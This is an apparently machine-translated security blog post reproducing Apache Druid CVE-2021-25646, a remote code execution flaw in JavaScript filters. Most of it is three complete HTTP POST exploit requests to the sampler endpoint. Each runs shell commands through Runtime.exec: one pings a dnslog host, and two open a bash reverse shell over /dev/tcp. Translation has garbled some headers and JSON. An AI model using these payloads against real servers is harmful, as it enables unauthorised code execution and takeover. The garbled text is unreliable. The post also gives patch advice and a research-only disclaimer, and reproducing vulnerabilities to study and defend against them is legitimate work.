Apache Druid Command Execution Vulnerability (CVE-2021-25646)
I. Vulnerability description
Apache Druid includes code that executes user-provided JavaScript functionality embedded in various types of requests. This feature is disabled by default in high-trust environments. However, in Druid 0.20.0 and lower, an authenticated user sends a malicious request and can exploit the Apache Druid vulnerability to execute arbitrary code. An attacker can directly construct a malicious request to execute arbitrary code and control the server.
Second, impact version
Apache Druid < 0.20.1
Iii. Vulnerability environment & Vulnerability recurrence
Docker environment:
docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
Copy the codeStart access:
Vulnerability recurrence:
POC:
POST/druid/indexer/v1 / sampler HTTP / 1.1 Host: IP: prot the user-agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.16; Rv :85.0) Gecko/20100101 Firefox/85.0 Accept: Application /json, text/plain, */* Accept-language: zh-cn,zh; Q = 0.8, useful - TW; Q = 0.7, useful - HK; Q = 0.5, en - US; Q = 0.3, en. Q =0.2 Content-Type: application/json Content-Length: 1045 Connection: close {" Type ": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\" isRobot \ ": true, \" the channel \ ": \" # x \ ", \ "timestamp \" : \ "1 2020-12-12 T12. 040 z \" and \ "flags \" : \ "x \", \ "isUnpatrolled \" : false ,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot \",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}Copy the code1, DNSlog:
The DNS records:
Specific data package:
POST/druid/indexer/v1 / sampler HTTP / 1.1 Host: 127.0.0.1:8888 the user-agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.16; Rv :85.0) Gecko/20100101 Firefox/85.0 Accept: Application /json, text/plain, */* Accept-language: zh-cn,zh; Q = 0.8, useful - TW; Q = 0.7, useful - HK; Q = 0.5, en - US; Q = 0.3, en. Q =0.2 Content-type: application/json Content-Length: 1018 Connection: close {" Type ": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\" isRobot \ ": true, \" the channel \ ": \" # x \ ", \ "timestamp \" : \ "1 2020-12-12 T12. 040 z \" and \ "flags \" : \ "x \", \ "isUnpatrolled \" : false ,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot \",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping gpg7qd.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}Copy the code2. Rebound shell operation
Specific data package:
POST/druid/indexer/v1 / sampler HTTP / 1.1 Host: 127.0.0.1:8888 the user-agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.16; Rv :85.0) Gecko/20100101 Firefox/85.0 Accept: Application /json, text/plain, */* Accept-language: zh-cn,zh; Q = 0.8, useful - TW; Q = 0.7, useful - HK; Q = 0.5, en - US; Q = 0.3, en. Q =0.2 Content-Type: application/json Content-Length: 1044 Connection: close {" Type ": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\" isRobot \ ": true, \" the channel \ ": \" # x \ ", \ "timestamp \" : \ "1 2020-12-12 T12. 040 z \" and \ "flags \" : \ "x \", \ "isUnpatrolled \" : false ,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot \",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}Copy the codeA simple python script for rebounding:
Four, safety suggestions
You are advised to update Apache Druid as soon as possible.
Druid.apache.org/downloads.h…
Github.com/apache/drui…
Reference:
www.secpulse.com/archives/15…
Mp.weixin.qq.com/s/ToGaV-wR2…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq\_3760279…
Personal blog garden: www.cnblogs.com/thelostworl…
FREEBUF homepage: www.freebuf.com/author/thel…
